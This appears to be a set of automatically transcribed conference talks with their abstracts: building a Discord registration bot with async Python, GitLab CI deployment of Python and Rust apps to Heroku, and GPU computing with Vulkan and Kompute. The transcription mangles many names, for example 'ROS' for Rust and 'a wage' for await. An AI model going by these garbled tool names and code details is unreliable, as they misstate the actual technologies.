lot of times you're using a-sync. But for me, it's quite new. I was, well, I'm not a web developer. I rarely do web-related kind of development. So, yeah, this is kind of new thing to me. So what they have done is actually they have a big rewrite before, so they've changed from zero version to like version 1.0 and beyond. So if you go to check out the latest documentation, you'll see that it's actually in one, you know, so there's actually two big versions. So sometimes if you look for a solution of how to do things, make sure that the answer is more reasons, you know, on Stack Overflow or things like that, right? It happens a lot, you know, for example, the Python 2, 3 things that sometimes when you Google something in Python 3, if you just type Python, you know, some answer may come up as like Python 2 answers. So it may not work in your Python 3 code. So the same applies to when you use this code, the py, make sure that the help that you get is actually in the sense of the newer version, the rewrite version. So also because it's very, you know, they got a really big community and also is a very popular tool. So the development of the tool is very fast. And also like every time if this got API, have some updates, of course, there will be an update in this code.py to follow. So just make sure to update it as frequently as possible because the development is quite fast. So there's something to really keep an eye on. So now I will give you a brief code walkthrough of the Discord bot that I built for your Python. Basically is a code to check people whether they have got the right ticket, they have the right name and, you know, and their ticket number. So bear in mind that this is like almost half a year ago. So like I said, like this code may not work right now if you're using the latest version of Discord.py because this development is super fast. You can see the last commit is in July. So it's definitely out of date, but I'll just show you as an example. And it's, and also it's not like a very nice package. You may see that the code is correctly because this is just like something that we built in a first short time right before the conference. We just want to make sure that it works. It's launching in the cloud. This is kind of like one off, like one use, it's got to be, you know, just for us to use and it's like we, I mean, the sole maintainer of it. So that's why it's a bit ugly, but please don't worry too much about it. Okay. So there are basic things. I have a locking system just to like, we can extract the lock if we have to. So also there's a few like environment variables that we store the ID of the channel. So these things most probably you want to keep it private because the channel ID and you know, well, if you are using this code, you can actually switch on a developer mode and check all the channel ID of the channel that you're in. But you still don't want it to be public because there may be people not in your channel that they could find this ID and they may abuse it. You never know. They should not have the right permission to do so, but just to be safe, like I would love to keep those private. So that's why I put it in environment variables. So that when you, you know, like here you put your code on GitHub publicly, it won't show anybody. So yeah, this is just like to check whether we have those variables set up. So if I name just like your Python, yeah, this is very rough. This is like kind of not very well packaged. So you can really fully change it as the external variable but that's fine. Because there's some like being text that I've put in there. So this like this is restrict forward. Nothing fancy here. Just say like a different welcome message when we have registered people in with different rows. Okay. So here this is the, this got pi thing, right? So everything is actually command.board. Okay. So this is kind of like a client that you put in when you have some API clients. This is kind of similar to that. So a board is very important. You will see it everywhere later. So yeah, also, well, we just set up a board and also like there's some basic method things that you can set up description, for example, and also like how command was the prefix that you use this would be the prefix to the user. They have to type when they trigger the board. So this again, something method data about the board so you can set up in advance. Okay, so here's just another helper function and again some other helper function. I'll skip over the things that are not very relevant. So here this is something different. So now we're using async. So instead of, you know, just define a function like you would do all the time. So one thing that you see that is different in async code is that you see async dev and then also inside async dev most probably you'll find a way. So async and a way. This is something that's new. So and I would go into detail later in the presentation, but let's go through it first. So like this board here, like I said, it's kind of like a client is very important. So for example, if you want to set up an event listener, you use a atbotch.event decorator to basically change your async function into a listener. Okay, so a botch profile, these things are very useful. So this one is just checking when the board is already done, it just do all these things. You have to have other event listeners. Well, you can check them out in the documentation. I don't have enough time to go through them all with you. Please check that out yourself. So there is a botch.command. So this is actually set up different commands that you can trigger with your prefixes. So if someone type my prefix is exclamation mark. So if someone type exclamation mark register, then they could trigger this async function here. So yeah, this is what it's doing here. So I'll skip over the things that's, you know, it's not too relevant. There's also help command that you can set up because I've said that in my board status, actually a default help that you can set up. So this is what I did here. And then this is the last thing that's important. So you have to actually put, so okay, this is just an event loop. So yeah, you just like set this async function, recent help into a task that run in the event loop. So I'll explain that just in a bit. So and then to make sure that your board run, you have to put a botch.run and then now you have to set up your token here. So this is how your board is authorized to run in the server that it belongs. So because in this course, you can create a bot almost like a user. So it's kind of like similar of creating an account for yourself, but you create an account for your board. Of course, not with the same interface, you create it with the developer portals there. You created that and then each board will be given a token. It's a secret. So at the end, when you deploy your botch here in this code, you have to give this the secret here. So it knows that it takes the identity of the botch that you register on Discord. Okay. So once you set that up, you just have to invite your botch into your Discord server, your community, and then your botch can just do the things that you give permission for it to do. And of course, it will run the code. So yeah, the code needs to be deployed. Where the most common way is to deploy on a cloud server, things like that. But just for fun or experiments, you can actually run it on your local computer as well as long as it's having the internet connection all the time. So it's, well, your bot need to be online, right? So that will work as well. But of course, in production environment, you won't do that. Okay. So here is the code. Just a very brief look. I hope you get an idea of how it looks like. So let's continue our story about async. So this is the story about async that I first told it in my Twitch, my stream. So it's like once upon a time, there are generators in Python. Okay. So there's one thing that I assume that you already know, given you have some Python experience, that we have generators, that we could actually create something, create something that we call an iterator, that it loop through things. It's, you know, it's, you know, it's kind of like a function, but instead of just return and then that's it. It will just give back some information and it will be hanging on there, is still there, is just hanging on there until you call it again. Okay. So that's a generator. As a generator is actually what's behind the iterators actually what behind a for loop when you write a for loop. Okay. It's just, just so you know, but I assume that you already have that knowledge. So, but even you have used generator before, maybe you haven't noticed that you can actually send something back to a generator. So most of the time when we think of a generator, it will create an iterator that every time when we use something, we'll get something back from the generator, right? Well, that's only halfly true. And other things that actually can send something back to the generator. So here's a code snippet that actually give a small example that you could of course yield a number from your generator. But you can also send back a number by using, you know, calling send to method sense to send it back to generator. So you can see here we create a number generator with n equals to 10 and then here when we connect it will, you know, execute and then it will be reaching at this point here. Number equals to you. So we are using nothing. So usually you have something like that right you then and something you kind of like returning something out using you, right? But here we just execute it until it hit you. It'll just stop there. It doesn't really like give back anything. It's actually using none. So this, if you want to see what's this next thing, it will just give you none. It doesn't matter because we will call g.send which actually it would execute and then now we, you know, well n because it's 10 is like 10 and it's 10 and then like number is basically now it's like nothing. So it would basically hit here that we would send back five. So here actually what we do is that we were here, right? So when we call next we hit here and once we send back five, number is equal to five. So now we can check that five is actually less than 10. It will go into the while loop. So it will keep going until you send something that actually, you know, is greater than 10 or you have something that, you know, when it incremented and then it will be greater than 10 or equals to 10, right? Then it will stop. Now this is how it works. It's a bit funny. At first you would get used to it when you see more example of it, when you have used it. Well, but yeah, it's difficult to find a use case to use it unless you're writing something very, you know, for it's very close to async I would say because you are now like you see why this is very similar to async because well, and then we have, you know, so this is how it evolved, right? So Python 3.3 we have used from that actually we kind of make this use things, have more complex. We can now just like chaining all this difference generator in a bunch. So these things that you could do sending things back and forth. Now we have a more complex version of doing that. You can actually chain up all this decorator, not decorator generators. And then using euphem, you see that like we can actually chain these three generators up and then basically when we go through them, the control actually is like pasting all the way like up and then down again. So you can see here, I think I'm kind of running a little bit you know too slow before so I've got to speed up this part a little bit. So you can see that when we cut top actually we pass all this, you know, controlled up all the way to bottom and then you back and then pass it all the way back to the top. So all these generators are actually like passing control you know to each other, right? So this is something that is very different from the same code that you're used to and because we are now stepping more and more towards the ramp of async. So because we have this thing, right? We have like I said, we are passing control from one generator to another generator. We can actually change how things are called. We can basically have these code running. We can pause and then pass it to another code that keep on running and then it will just pass something back and then you continue from where you left off. This is async. So that's why when we go from 3.3 and then developers see that actually we can have something like you know, Python, we can actually use Python like an async asynchronous programming language like JavaScript or things like that. So we actually create this async.io as a standard library and then it introduces event loop and a core team that you could use when you are writing a Python code. So this is the first time that async become official in Python as a standard library that you can import. So event loop, what is an event loop? I have mentioned event loop a few times already in this talk. So to think of what is an event loop is like a task manager. So it could like I said, now we have different part of the code that actually it will run, you know, kind of passing the control around from one to each other. When does this, you know, this part of the code execute? When does it stop? Especially when we are running them asynchronous or when to pass, you know, stop and run and all these, we need a task manager to manage it. So event loop is the task manager there. So it's controlled what is running together, what is pausing it when and pass control to who. So all these intricate things is managed by this event loop task manager. Okay, core routine is, well, it's just like I said, all these like snippet of code, right? So in synchronous function or this snippet of code, we call them function because there's no other way. There's only one thing that's happening at the time. So you have your main code and then you could actually pause your main code and then call your function in and then you just like run the function and then it would just continue. There's no back and forth and pass to another one. Well, you can only like call from function to function, but you can't pause the function and go back to it like you did with generators or core routine. So core routine is like a YouTube video. You can pause at any time. You know, for example, if you're watching a movie on YouTube, you can pause it, go to the loo and come back, go to the toilet, bathroom, whatever you call, come back and then play it again. So it's different. A function is kind of like something that you can only play it once. If you stop it, if you return it, that's it. You can't go back to where you left off and continue. Butch core routine is like a YouTube video. You can pause it and come back to it. You know, YouTube is so smart that now even you watch something in the middle, you pause it, you close your computer, whatever. Tomorrow you can come back to the link and it will remember where you left off if you have signed in or something. So it's really cool. So core routine is like that. So all these actually give us all the tool that we need to write async code. So this is how it will look like in Python 3.4. You can still write things this way in the version of Python, but we have better way to do things afterwards. But this is what it will look like if you want to be compatible for Python 3.4. So you would have async.io import as a standard library band. Now you can see that we have a generator here. We have like a year from, right? So now if we add the decorator async.co routine, so coroutine is actually a decorator. If you add this decorator, it will become a coroutine. So you can actually put that into the event loop. In async.io, you can create an event loop by calling getEventLoop and then you can put the task in there. So you can actually call it like wage and then do the task. So these two tasks actually would be running together and then in the event loop and then until it's done, then you can close the event loop. So run till complete just means that I run the tasks that I've set up and then do that. Okay. Yeah, so this is already very nice, but it's not the most fluid way to have coding because you still have to use the decorator. So basically all the syntax is still based on a generator format, which like I said, like this year from could be a little bit daunting for people who are not familiar with it. So, yeah, so we have a year from and then 3.5. So one step forward. So we already have async and a wage that everybody loves. So now I instead of writing a generator, you can just write an async function like a function. The only difference is that instead of return, we can still return stuff, but well, you would want to use away because then it would be an async function, async or routine that you could actually have an a wage to give back a wage to wage for this answers to come back, right? So and you can also a wage for this async function. So you can a wage for a if well, I call it async function, but actually it's a core routine. So you can. So this stuff here would be also in async. Then you can a wage and wait for it to return something back. Okay. So, so that's actually a brief introduction of how async work. So now for the next few minutes, I would came across some questions that I have in mind when I was writing async code. So I want to the thing is that mixing sync code with async code. Like I said, you can also still you can also return in your async core routine async function. You can still call in a sync function. So if I call a sync function in the in an async function, what will happen? And the other question I have is that I want to do through the things, right? So I have different parameters that I want to run my async core routine to each one of them. But well, I don't want to run it like a for it, right? One by one. I want it to be async. I want it to be multiple core routine that using different parameters that I set up and, you know, do it all together. So how can I do that? I found answer of these two questions on stack overflow. So I put the, so I put the answer there, but I will go through with you quickly here before my time is running out. So you cannot wait if it's not async. Like I said, you know, anything that you put away here, for example, sorry, for example, here, you see that I have just a normal function here. So this is definitely sync, right? So daff and return, you know, sync. And now here we have a async and then we can't do this. This will give you an error. You can't wait for something that's not async. So how can I do that? How can I actually have this do task, which will be something async that runs in the event loop, but inside it will call this functions that, well, it's made, well, you would say that why, why, why I don't make it async? Well, sometimes, you know, if you call in a library that it may not be an async, right? It's already written. It's not in async. So what you can do is that actually you can use this event loop method here, run in executor, and then you can put your sync task into the running executor and make it into, make it into something that you can use in your async function. So here you can see that it becomes its own task and then, and then you can now call it, well, of course, like this do task will still be async, but, but it would down here to wait for this, you know, returned from here, from the long running task here. Otherwise, it will be a little bit messed up because this is async and other thing was still running, but now you know that in this async routine, you have to wait for this sync task to finish. Okay. So this is how you can use await for, you know, a sync function. So it can make it workable with within an async context. So question number two, how can you write a for loop in a async kind of way? So here it is another questions that I have in mind someone asked. So there's different parameters that I want to put all these into different coroutines. Well, I have one coroutine. So I want to put all these different parameters into them and run all of them in an async have manner, not like a for loop here. You can't make an async for loop. This is not syntactically correct in Python. So what you do is that you can actually use this. There's some like again, async I of save the day. You can use as completed and then you can map or these things inside. You can put a map in there and now you can a waste the future. So now this for loop will actually give you some like some async kind of coroutine that you get a wage, which is super cool. Well, I don't have enough time to go into detail, but this is how you can handle it. So instead of having a for loop, so you know in a for loop it would be just a iterator that iterates off two of them. It would become kind of a waitable iterator. You can think of it this way.
Everybody hates mundane tasks, they are boring, repetitive and time-consuming. That’s why I love building bots, they can finish my tasks for me by working 24/7. But to build a bot to interact with the users, you have to write in async. If you are afraid of async, don’t worry! Today I am telling you how I learn using async and how I avoid checking in 500+ people in a conference by building a bot with Discord.py. In the first part of the talk, there will be a short introduction to Discord. As more and more conference goes online, it’s become a more and more popular tool among the Python community. I will also introduce Discord.py, a python library that offered an async API to let you build a Discord bot. This will give the audiences a background about the following quick demo and explanation of a simple bot that I built. In the second part of the talk, I will walk through how to build a bot for registering attendees for EuroPython. Following a quick demo, I will also give a walkthrough about some of the async coroutines available in Discord.py: event listener like on_ready and commands. I will also explain how the async code is different from the sync code and the danger of mixing them together. Hopefully, audiences will be inspired to build their own bot and learn a little bit about writing async code in Python and using Discord.py. This talk is suitable for attendees who got basic knowledge in Python but not necessarily know about Discord or async.
10.5446/53296 (DOI)
Hi everyone, I'm so happy to be here joining the Python track at Fossilent this year. Today's talk will be about how to get started with Python and GitLab CI. There are different use cases for the kind of Python apps that you can use a continuous integration tool for, but let's talk about apps built with Python and ROS. I first started learning about continuous integration while there is enough documentation about how to use a tool like GitLab CI with Python for publishing your application on a cloud platform like Heroku and also there is enough documentation about how to do the same task for ROS. There isn't enough documentation or there wasn't enough documentation about how to configure your CI tool for applications built with Python and ROS. You can use ROS for writing native Python modules. You can run Python code directly from a ROS binary and for that there are some libraries. Those libraries that we can use for that are C Python and Pyro 3. If you go to crates.io you can find another library. As for talking about how to configure the local environment, there are some ways that you can install Python. You may be familiar with that already. You can download from python.org. If you are using Linux you can download and install from the repositories using the package manager of your Linux distribution. You can also use PyM. But something to remember about that is that if we want to use Python with ROS we have to build Python with enabled share. If you decide to use Python for installing and managing the versions of Python for the project you are working on. For installing ROS you can use ROSTAB. You can find more information in the official website of ROSTAB. That is ROSTAB.rs. You can install the stable beta or nightly version of ROS running the command that you see here. Or you want to build a custom Docker image with Python and ROS and the development tools you require. You can find a Docker file that I am using for building a custom Docker image for that. If you go to gitlab.com. You can find the Docker file that I am using for building a custom Docker image for that. Something about Heroku. Well, Heroku has support for Python and ROS. There is an official build pack for Python. There is a community build pack for ROS. But something to consider is that Heroku doesn't have support for Python built with enabled share. And you will need to build Python that way so that you can run your applications built with both technologies. But let's talk about the support that Heroku offers for Python and ROS. There is an official build pack. And for specifying the dependencies of your project, you can use our requirements.txt file or a pip file if you are using pipm. You have to create a proc file with the configuration and the instruction that Heroku will run to start your application. You have to specify the run time, the Python version that we are using for the project. We have to create the run time.txt file. And if you decide to use a tool like poetry, there is a build pack that has support for this tool. Talking about ROS, there is a community build pack. You have to add, apart from your cargo.tomo file, that is the file where you specify the dependencies of your project and some additional configuration of your application. We have to add the proc file that will contain the instruction for the start application and a ROS config file with the version of ROS that we are using for the application that we are working on. Well, something that I didn't mention is that if we are building apps with ROS and Python, the crates available for that require the nightly version of ROS. So that's the version of ROS that we have to specify in the ROS config file. The demo that I want to show you is a web app built with ROS that has access to a Firebase database. But when I started working on this demo, I found out that there wasn't a Firebase driver for ROS that works. So I decided to use the Python library. The GitLab repository that you see in the slides is the application that I will be showing later. Well, this is the repository where is the code for the application that I want to show you. And all the configuration files that we require for that, I will explain that later. But if you want to check the code, just go to that repository. So let's talk about continuous integration for Python and ROS. Talking about the configuration of CI CD for Python, we have to create a proc file. That's what I mentioned before. And that proc file will contain this instruction. We have to add the Unicor as a dependency for the project. And this is the way that we start the application. And we have to specify the dependencies of the project by using PyPrize.toml file or a requirements.txt file. Depending on the way that we are managing the dependencies of our project, we have to specify the version of Python that we are using. And you can check the code here. So you will find the configuration files and you can check how we can configure the CLAB CI for that. Talking about ROS, the proc file will contain this instruction as Heroku assign randomly the part that the application will work on. We have to assign this value to this variable for configuring or running the application properly. We have to specify the environment where the app will be running. We are running this app in a production environment. We have to specify the path for the binary that ROS creates when we compile the application. We have to make sure that the cargo.toml file is in the repository. We have to add the ROS config file and specify the version of ROS that we are using that could be stable or nightly. And we have to add the rocket.toml file. This file contains configuration about the URL and the board and other configuration related with where we can access the application. And the URL is the one that Heroku assign when you create a new app in the platform. And we also have to add the GitLab CI configuration file. You can check that in this repository, the repository that is listed in the slides. And now talking about continuous integration, if we are building apps using both technologies as Heroku doesn't have support for Python built with enabled shared, we have to use Docker image for deploying our application to Heroku. And instead of creating a profile, we have to create a batch script that will contain the instruction for running our application. And we have to add or make sure that the files that contains information about the dependencies of our project for both languages, Python and ROS are available in the repository. Those are cargo.tomo file. If you are using poetry, that should be pyproject.tomo or requirements.txt file depending on how you are managing your dependencies. And the Docker file that will contain the instruction for building that custom Docker image with the application. And for the configuration of the dependencies of the project, if you are using poetry, this is how the file will look like. This is a demo of a web app that is built with ROS and has access to Firebase. We are using the Firebase library for Python. These are the dependencies for that. We have to specify the version of Python that we are using. And this is how the cargo.tomo file will look like. We list the dependencies that we are using. Server that is a library for serialization and serialization of data. And Rocket that is a web framework for ROS. See Python that is the library I chose for developing this demo. And I specify the versions of that, those libraries here and the version of Python that I am using for this application. For configuring Heroku, we have to create a new app. We normally add the build pack for application depending on the language or technology that we are using. And if we are using two different technologies, we can add both build packs. But now that as we are creating a custom Docker image, we don't need to do that. So we don't need to add the Python and ROS build packs. And after creating the new app on Heroku, we have to go to the dashboard of our account and copy the API key. We will need this value for configuring the repository and to tell GitLab CI how it can have access to the Firebase database. And that's what we do in the following step. We have to configure GitLab CI for that. We in the repository go to settings, CI CD, click expand. And in the variable session, add a new variable named Heroku API key and paste the API key in the value field. For configuring GitLab CI, we have to create this file in the repository. And we will have two stages, one for building the custom Docker image. For that, we will be using build that and after building the custom Docker image, we have to add that image to the Heroku registry. Heroku has a registry similar to what we have if we are using Docker Hub or if we are using the registry that GitLab provides, we have to add that Docker image to the registry of Heroku. That's what we do here in the last instruction in the build stage. We build the Docker image and then add it to the Heroku registry. And for the last stage, we have to publish that Docker image on Heroku and for having access to the applications, once the pipelines are run, after we create this file, the pipeline starts and we can see that in the repository, I will show you that in a minute. So let's go to the repository. But first, let me show you the examples that I mentioned before. This is one example of how we use GitLab CI for an application built with Python and using only Python and not other language. We have the profile here that contains instruction that Heroku will run for starting the application. We are using the Unicorn for that. I'm not using the community build pack that offers support for poetry. That's why I have the requirements.txt file in addition to the pyproject.toml that is the file that poetry reads for knowing what the dependencies of our projects are. Here we specify the version of Python that we are using. This could change depending on the kind of project that we are building. And what is important is the configuration file for GitLab CI. We have only two stages, test and deploy. For testing, we are using flight test and we have to install the dependencies that are listed in the requirements.txt file. After that, running the test by running Python flight test. We are using the official Docker image for Groovy for deploying our application to Heroku using DPL. We have to specify the name of the application, the name that we assign to the application when we create it on Heroku. And this is the variable that we created before. And if we go to the ICD, you can see the pipelines that were run. We have two jobs, test and deploy that are the stages that we specify in the GitLab CI configuration file. If we go to the test, these are all the instructions that were executed in this stage. Installation of dependencies, the tests are run below the field. And if the job succeeded, we will continue with the next stage that is deploy. If we go to deploy, this is what we have. Heroku detects that this is a Python app and the version of Python that we are using and dependencies. And finally, our application is available here for ROS. This is the example that I mentioned. Some files are different. We have the rocket.toml file and the instruction listed in the proc file is different as the way that we build applications using ROS is different from Python. What is important here is the URL, the base URL. This is the URL that Heroku assigned to your application. We have to specify that here. This is the configuration for the production environment. This is for ROS. But what is important is here. This is an application built with both languages, Python and ROS. This is the file that contains the list of dependencies for ROS and this is the file that contains the list of dependencies for Python. And run is the bash script that contains the instruction needed for running our application. And what is important here is the Docker file that contains all of the instructions. I'm using Poetry. And I'm also using Python, so I have to use that for configure the environment. I'm using a custom Docker image that I created. And here I am specifying the version of Python that I will be using for this application. And here I installed dependencies of Python and create a copy of that. So the CI CD tool doesn't need to install those libraries again. Maybe if there are some changes or there is a new version of that. Okay, after that I configure the environment for the Python code. Just in Poetry install and build the dependencies of ROS by running cargo builds and preparing for a production environment. And here I specify the instructions that will be running for starting the application. And after that, after all of these instructions are added and the CI CD tool is configured, we can check the pipelines here. We have two stages build and release. Here we have we build the custom Docker image and add it to the Heroku registry. And here we publish that application. And if we go to the URL that Heroku assigned to the application I created, that is this one, ROS Python demo dot Heroku app dot com. And this is just a basic example that brings a list of names that are stored in a Firebase database. And this is how we start with GitLab CI for Python projects. And I wanted to talk about how we configure CI CD tool like the one that GitLab provides for applications built with ROS and Python. There wasn't enough documentation about it and I've been writing and publishing some blog posts to document how to properly configure our repository and the CI CD tool and Heroku. And I will write more about that later. But if you want to check some of the blog posts that I already posted, you can go to that, I'm writing on depth and you can find me also on MarioDMD on Twitter and you can check the repository of the application that I showed you. If you have any questions feel free to ask and thank you so much for joining me today.
If you develop web apps with Python and want to take your project to a cloud platform like Heroku, using a continuous integration tool can help you with this process and optimize time and resources. Running tests and deploying your app are some tasks that this tool can help you with. Through this talk you will know how to use GitLab CI on your Python projects.
10.5446/53298 (DOI)
Welcome to my talk on beyond CUDA GPU accelerated Python on cross vendor graphics cards with Vulkan and compute. My name is Alejandro Saucedo. I am engineering director at selling technologies, chief scientist at the Institute for ethical AI, and member at large at the ACM. So we're going to be delving into a very interesting set of topics, primarily around the parallel and GPU computing ecosystem. We're going to talk about what is the Vulkan SDK, and how you can use the compute framework to build Python GPU accelerated applications together with a set of hands on examples, as well as some references, that you can actually delve into, if you're So, to start with, we want to cover the motivations of why parallel processing. And I'm going to be referencing a research survey. I recommend checking out as well in itself, as it basically collects insights from 227 papers in the parallel deep learning space, which provides a much more intuitive perspective of the adoption, and this trend of adoption on GPU for not just scientific computing, but also general purpose computing, and some key observations that are really interesting is to see how the emphasis around a lot of the functions and paradigms in this computational areas that can be abstracted into highly highly parallelizable steps, and others that may not in themselves be highly parallelizable, can actually be reduced into equivalent structures that that then can be processed with specialized hardware, like GPUs or even you know more than you might use. There's also concepts that are continuously evolving. You know, a simple one that may you may have come across is the concept of micro batching which is basically being able to not just process a single data point, but also being able to process several more at the same time to ensure that the computation is done at a single, or, you know, in a way intuitively on a single sort of parallel clock speed or clock iteration within that that perspective instead of just submitting each one separately, and very interesting and innovative ways of breaking down computation that can actually be processed in parallel to then be re aggregated. And the interesting thing about this paper is not only how the trend is moving towards this parallel processing, and you know GPUs and GPU type hardware, but also that it's expanding into distributed processing leveraging this parallel capable type of hardware. So really interesting area. Now, delving into the into the ecosystem, and the motivations of why, you know, we're even having a new sort of framework the Vulcan SDK which we're going to introduce in a bit is particularly given that there is this this year range and heterogeneity when it comes to the GPU and parallel capable processing hardware, like to be used etc. So this involves multiple different players multiple different architectures, different drivers, and consequently different frameworks available to take advantages of this parallel capabilities, as well as for example, you know, the increase in very powerful mobile capable components that now we're carrying in in our pockets as smartphones. So there is a sheer amount of need in this space due to the heterogeneity of the different hardware across different vendors. And the same perspective is one of the key motivations of why Vulcan came to be Vulcan is a cross industry initiative that brings in several of the leading industry players to create this open source and I think that's the one of the more exciting parts the open source and open sort of standard that focuses on not just interoperability but also performance, and this is reflected in the interface that is exposed by the Vulcan SDK. In regards to the Vulcan C++ SDK, there are several advantages and disadvantages as you would have with anything. Some of the very strong advantages is that it has a very low level interface with rich access to components that comes with this explicit and verbose API within its core that provides you a, you know, no language, sort of sophisticated verbose to your abstractions, pure direct access into not just the Vulcan SDK but also the hardware underneath right and this is very important for optimizations that are very important. There are a broad range of industry leading players that are contributing to the standards and to the SDKs and to the tooling, which has been very, very encouraging to see. And also, there is an emphasis towards this interoperability and high compatibility across different platforms, mobile suppliers, AMD and VDI Qualcomm etc. And there are very strong strengths right strong advantages. You know disadvantages you know, we also have that it's very low level with rich access to components which means that there is a lot of complexity, and you know a very rich interface that needs to be interacted with. And similarly with the C style API even though it provides you a what what you see is what you get with the hardware level. That means that there needs to be a lot of domain specific knowledge to be able to build the foundational layers required to start building the application components. Right with that. There's also the broad range of top players which even though it's a great thing, always with many opinions, many voices, there will be a lot of sort of interactions that will be pulling towards different directions even though they would have this sort of like best of a high compatibility in mind and trying to push for, you know what is what is best and again you know with a high compatibility across multiple different platforms that means that it needs to deal with a very rich interface that are not just rich interface but but rich set of flexible, you know, back ends that can actually interact with with this sheer number of different hardware that is underneath. And that's what the texture of the Vulcan SDK looks like so the Vulcan application is the overarching components that we will be seeing from applications you can actually spin up instances, these instances are the ones that then allow you to, you know, talk with the physical devices that C++ component that, you know, actually refers to the to the to the physical graphics card that you have in your computer. And then you can create what is referred to us logical devices or windows or views that then allow you to interact with the physical device right. So that logical device you know you can have multiple logical devices for one single physical device and we can have multiple physical devices for an instance, and multiple instances for an application. Right so this is where it starts getting a bit complex but to keep it simple, you know with this logical device the way that you interact with it with it with the graphics card is through a queue, and this queue would have multiple commands right and you know you can have multiple instructions that need to be executed. Right and ultimately this is how you would be able to submit instructions to the GPU. Once you actually want to run more complex components that's where the pipeline comes in. You know there's the compute pipeline the graphics pipeline but we're going to be just talking about the compute pipeline. This is all just to provide an intuition, you know we actually have another talk that you'll be able to reference and check out, as well as a documentation that explains all of this in detail this is just to give you an intuition once we delve into the depths of everything. With the pipeline. This is what you're able to say well I want to actually run a specific set of instructions as per a piece of code or an algorithm that is often referred to as a shader, a shader module. So this shader is basically going to look like a piece of C code that just so happens to run on the GPU itself. And this shader this piece of shader in the pipeline will also interact with data, right, and this data is referenced through the concept of the script or sets which again you know, you're not going to really have to like know all of these different things but it's still important to get an intuition that this is what's happening under the hood, right so the script or such as like a container that basically says well I'm going to be using this GPU visible GPU visible data, so that when you run a set of instructions it can actually reference this this different things. And you see that because we're interacting with this queue, the CPU in itself is able to send requests so you send send instructions to the GPU with its own specific memory address space, and even though there are shared memory spaces which means that you know the CPU may have access to see some of the data in the GPU memory. There is different address spaces for different computational areas in the in the actual hardware of the GPU which means that the actual code your C++ your Python will not be able to see that memory space. Right, and that means that you would be able to interact with your GPU with this SDK akin to what would be you interacting with a remote service, sending requests for the service to execute as if it was an API. And you know, even though this is not correct because this is your own machine. This is actually a good intuitive way to see how you're interacting with that GPU given that it is through this queue with, you know, asynchronous buffer that are executed and of course you can then have all the things that allow you to await until the execution has been finished, which we may actually talk about in later on. And, you know, being able to build the foundation code required to actually run a simple program in Vulkan, you know only takes, you know, from 500 to 2000 lines of C++ code, right. And this is the motivations well some of the motivations for compute itself the compute framework. So compute enables developers to get started interacting with the Vulkan SDK with dozens instead of thousands of lines of code. And the key thing to emphasize here is that the core principle is to augment the Vulkan interface instead of abstracting or hiding it. So bring your own Vulkan interface, which plays nicely with already existing Vulkan applications so you already have a Vulkan application to render graphics related stuff you'd be able to actually pass those Vulkan components, and it has non Vulkan naming convention and we're going to talk about that. It's just basically to avoid ambiguity as there are libraries that you know may have classes called buffer, and it's like is this buffer from Vulkan or for this other application right so things like that. So now, in regards to other features is that it has, you know, a C++ interface, but also the Python interface that we're going to be using today. It has explicit CPU and GPU memory ownership and this is important if you're using non compute Vulkan components right if you're already using Vulkan in another area of code role Vulkan. So we're planning access to GPU queues which is very important for optimizations, you know which we have some material that actually explores that in more detail. There is, you know, single header file for the C++ development and a Pi Pi module for easy installation with the Python, and it has integration with mobile apps through the Android and DK, as well as game engines, such as Godot, which is also part of the C++ and conference, and there is going to be a few links about that. So, how does the compute architecture look like. And this is basically relatively or conceptually simple. So everything starts with a compute manager, and the compute manager is the component that basically overseas and and manages all the explicitly and memory that is then created through your interaction with this, like compute application. So the manager in itself would handle this sort of like device and on the queue, which we talked about, you know, you don't need to go into that much depth, but it's still important. You can have sequences and sequences are basically basically single or batches of operations to run on the GPU. Right that's basically what a sequences, and you can have multiple sequences with multiple operations. Each sequence can have one or many operations, and each operation basically performs a specific action, and operation can have one or multiple tensors and tensors are basically abstractions into GPU and CPU memory, as well as the workflows related to move the memory around it. And optionally, you can also have what in the compute world is referred to as an algorithm, and an algorithm abstracts the concept of the pipeline, the Vulcan pipeline, the, the the nodes, and the specific shader code that then you can actually say well I want to run this, this code in the GPU with this specific data structures, and I want to run it in this type of way. Right so we will see what that actually looks like in more practical terms. But this is basically it right there's there's, there's not much more around this, and there is an almost one to one mapping between the compute components and the Vulcan and the explicit to reduce ambiguity. Now let's see what that looks like. So, in Python, you would basically create a simple manager, right, you would then create a set of tensors with, you know you can pass non pi arrays or Python lists. It's basically just to tensors that are going to be used in a multiplication and then the output where we're going to save all of the results. Right so that's what we're going to basically use you normally would actually initialize the tensors explicitly but there's a set of helper functions and you know take your CPU host memory list, and then copy it into GPU only memory. So all of this is is is handled to you. But again, it's not handled through magic. Every single thing can be actually accessed, and you can actually call those things yourself if you wish to which is very important for for for several optimizations. So we're going to define the shader code. This is basically the code that you're going to be running in the GPU. In this case is just basically a simple multiplication using the pie shader decorator. In this case we have the first buffer the second buffer, we're going to run a multiplication and store in the output. That's basically it. This is going to run in the GPU. We're going to actually run it through the manager so we're going to say we want to run this synchronously using this three tensors, and using this shader right and we can just basically pass that it runs synchronously we can also run it a synchronously and we can actually do a lot of optimizations which we're not going to delve into this but you can run it synchronously. Once it's finished running, then you can actually copy the data back, right make sure that the output is now visible in the CPU, and then you can print it right so you can actually see that our output is 246. Right so that's basically it. That's all there is to it, and this is all you need to basically do all of the crazy crazy stuff that happens underneath. But again, all of that crazy crazy stuff is really really interesting. And it is also very useful very rich and very relevant for once you're starting to do optimizations. So, ultimately not to hide but to augment. This is the key thing. So now let's actually delve into some of those optimizations that I've been mentioning. So what we're going to do right now is run a single command slash operation in through the manager. Right so we, we had the CPU running, we submitted that operation we waited then we came back, we then submitted the second one and then we came back. Right, what we can do as well is we can actually reuse multiple sequences, which means that we can pre record commands. So we can record a bunch of operations, and then run them so the CPU would basically then execute. So you can actually run specific, you know, operations that would run already, you know, in the GPU, and then you would actually wait until it's come back. You can actually run a synchronous. This patches or submissions of the of the of the of the commands, which means that you can actually not wait for the GPU to finish. So you can actually submit this, you know the CPU would continue doing other things while the GPU is doing other things, and then you can submit the other things as well as asynchronously and then do something else. There's also an await function that allows you to wait for the thing to to finish. And then finally, something that we're not covering in this presentation but it is also very interesting, is that you can also leverage GPU hardware concurrent to submit multiple batch operations that would then execute in different GPU queues that then would potentially run in parallel. And this is dependent on the hardware properties of your GPU and the families, you know normally for example in my NVIDIA 1650. So I have the ability to run hardware concurrent batches of GPU loads. If I submit them to one compute family queue and one graphics family queue we're not going to delve into that but if you're interested, you know there's there's a lot of like really relevant content in the documentation, as well as in the data stack. But today we're going to be actually covering something that delves into the world of machine learning. And what better thing to cover than the hell wall of machine learning, logistic regression, basically taking in a specific data point and classifying it as either, you know correct or false in this case is 